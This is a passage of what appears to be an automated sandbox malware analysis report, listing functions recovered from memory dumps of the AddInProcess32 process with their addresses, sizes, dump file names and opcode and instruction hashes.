                                              • Instruction ID: 472b3ce8e6252f4b30cdbafa33421b15e92344fce20887ae76cdf38bb1a67410
                                              • Opcode Fuzzy Hash: 9432de7b346c8bfbbcde4b5c736a2a9a59fdf184204724013eb463f1a6f34d46
                                              • Instruction Fuzzy Hash: 88117730B002098FEF16BB79D55476A3395EF85358F104DB9D046CF245DB65EC868BC1
                                              Function 02B30838 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 178c9216ba5a2c35a9f790e81e31b650137df97ed4cb7deb8abe961408404a37
                                              • Instruction ID: b2e053da6a614bd10e1929ad1ed11719682b45499583450340e81f94089045e7
                                              • Opcode Fuzzy Hash: 178c9216ba5a2c35a9f790e81e31b650137df97ed4cb7deb8abe961408404a37
                                              • Instruction Fuzzy Hash: B611E330A003098BEF267A74D80477A3755EF81258F104DBAD446CF285EB25D8468BC1
                                              Function 0110D02B Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463095786.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_110d000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                              • Instruction ID: f2923358c44023422deb8fc1b175c1742a9447b844e0df87303fbfeeb55b5905
                                              • Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                              • Instruction Fuzzy Hash: 0611BE75904280CFCB16DF94D5C0B15BF61FB84314F24C6AAD8494B697C37AD44ACB61
                                              Function 02B31450 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 232aef5a4187c50181360079f8051af45f3fc576d661f81eef0f9cc7304476b3
                                              • Instruction ID: 4ce087f6cbca595e7ce9cb5c574172ebdf2d1ef9ff4c1046e8e96b52859cab6f
                                              • Opcode Fuzzy Hash: 232aef5a4187c50181360079f8051af45f3fc576d661f81eef0f9cc7304476b3
                                              • Instruction Fuzzy Hash: DD016171E112159BCF22EFB984402ADBBF9EF49261B1804BAD809E7241E735D8428F91
                                              Function 02B37048 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e815d4cd5978a02cde4d8b4733061108daab47f038f9dfce4d9900b830cd7796
                                              • Instruction ID: ec5a7011abff7825c5dc1973a44d124ae96e086382cc8155fa41bec3a69c9b17
                                              • Opcode Fuzzy Hash: e815d4cd5978a02cde4d8b4733061108daab47f038f9dfce4d9900b830cd7796
                                              • Instruction Fuzzy Hash: EE011339B40504CFC715EB78D298A6C7BB2FF88325B2544A9E906CB3A4CF34AD42CB41
                                              Function 02B314DC Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3515a6a50a74d58970663c61bb04ae6703d5c4eee2b544554458be1fa580a12b
                                              • Instruction ID: 238332f2d8423995c529ea44326094abebd9a14af51699f25dc2be1ea930ded9
                                              • Opcode Fuzzy Hash: 3515a6a50a74d58970663c61bb04ae6703d5c4eee2b544554458be1fa580a12b
                                              • Instruction Fuzzy Hash: 76F0F033A142508BDB238BA894902BCBBB9EF8433171D00D6D849DB642D735D842CF51
                                              Function 02B380D8 Relevance: .0, Instructions: 35COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 311e6ea421faf0dfc2493e6ee04af178abd56ec18d323509ec197cdbf06748f5
                                              • Instruction ID: 7881846dde20a62c1a09cb2945b22bef3f2e368816ee0cadd97927980b257a4e
                                              • Opcode Fuzzy Hash: 311e6ea421faf0dfc2493e6ee04af178abd56ec18d323509ec197cdbf06748f5
                                              • Instruction Fuzzy Hash: D801A234A102498FCB06EBA4FE90EAC3BB2EB85344F1056A9C5551F295EF746A45CB82
                                              Function 02B380E8 Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ea4099d89d761ff5bec23f1ae524f73451a9ce8cf75b13dc57e89b822dd74d6
                                              • Instruction ID: 289ef1091144cd67142249dbe14330f9b0649ae10e7b3d2ea6db2c7dc8097d7a
                                              • Opcode Fuzzy Hash: 4ea4099d89d761ff5bec23f1ae524f73451a9ce8cf75b13dc57e89b822dd74d6
                                              • Instruction Fuzzy Hash: 6CF08134A10208DFCB06FFB4FA50AAC77B6FB84304F109678C4059B254EF706E448B82
                                              Function 02B309DD Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4b5f99b5de9ece29c10ccdf2922d32aa518e1850883357423913e6c2cd223b91
                                              • Instruction ID: 45b3cd4da93c319ececc0df1c301891aac79a44e57f8e09b7f7ba92993a407db
                                              • Opcode Fuzzy Hash: 4b5f99b5de9ece29c10ccdf2922d32aa518e1850883357423913e6c2cd223b91
                                              • Instruction Fuzzy Hash: 8AD05E2269C19485FE23206CA8E03B97700CF7A774F924EF2D798DBA1EC215D5A1C115